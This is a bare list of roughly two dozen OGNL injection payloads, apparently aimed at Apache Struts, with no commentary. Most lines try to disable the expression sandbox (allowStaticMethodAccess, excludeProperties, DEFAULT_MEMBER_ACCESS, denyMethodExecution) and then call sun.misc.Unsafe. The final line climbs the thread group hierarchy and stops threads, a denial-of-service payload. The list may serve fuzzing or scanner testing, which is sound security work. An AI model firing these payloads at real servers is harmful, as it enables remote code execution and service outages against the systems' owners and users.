%{@sun.misc.Unsafe@getUnsafe(),#_memberAccess.allowStaticMethodAccess=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false}
%{(@sun.misc.Unsafe@getUnsafe()).(#_memberAccess.allowStaticMethodAccess=true)}
%{(@sun.misc.Unsafe@getUnsafe()).(#a.allowStaticMethodAccess=true).(#context["a"]=false)}
%{#_memberAccess.allowStaticMethodAccess=true,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess.a=true,@sun.misc.Unsafe@getUnsafe()}
%{#a.allowStaticMethodAccess=true,@sun.misc.Unsafe@getUnsafe()}
%{#allowStaticMethodAccess=true,@sun.misc.Unsafe@getUnsafe()}
%{#a=true,#a["a"]=false,@sun.misc.Unsafe@getUnsafe()}
%{#a["a"]=true,#a["a"]=false,@sun.misc.Unsafe@getUnsafe()}
%{(#a["a"]=true).(#context["a"]=false).(@a@a())}
%{#a.excludeProperties=@java.util.Collections@EMPTY_SET,@sun.misc.Unsafe@getUnsafe()}
%{#excludeProperties=@java.util.Collections@EMPTY_SET,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess.excludeProperties=@EMPTY_SET,@sun.misc.Unsafe@getUnsafe()}
%{#a=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@sun.misc.Unsafe@getUnsafe()}
%{#a=@DEFAULT_MEMBER_ACCESS@ognl.OgnlContext,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess=@DEFAULT_MEMBER_ACCESS,@sun.misc.Unsafe@getUnsafe()}
%{#_memberAccess=@ognl.OgnlContext,@sun.misc.Unsafe@getUnsafe()}
%{@DEFAULT_MEMBER_ACCESS,@sun.misc.Unsafe@getUnsafe()}
%{#f=#a.a().a("a"),@a@a()}
%{(@sun.misc.Unsafe@getUnsafe()).(#dm=@ognl.OgnlContext@a)}
%{(#dm=@a@DEFAULT_MEMBER_ACCESS).@sun.misc.Unsafe@getUnsafe()}
%{(#dm=@a@a).(@sun.misc.Unsafe@getUnsafe())}
%{#a=@java.lang.Thread@currentThread().getThreadGroup(),#b=#a,#c=#b.getParent(),#env = '',#while = "#b=#c,#c=#c.getParent(),(#up)(#env)",#up = "(#c != null)?(#while)(#env):1",#b.stop()}


















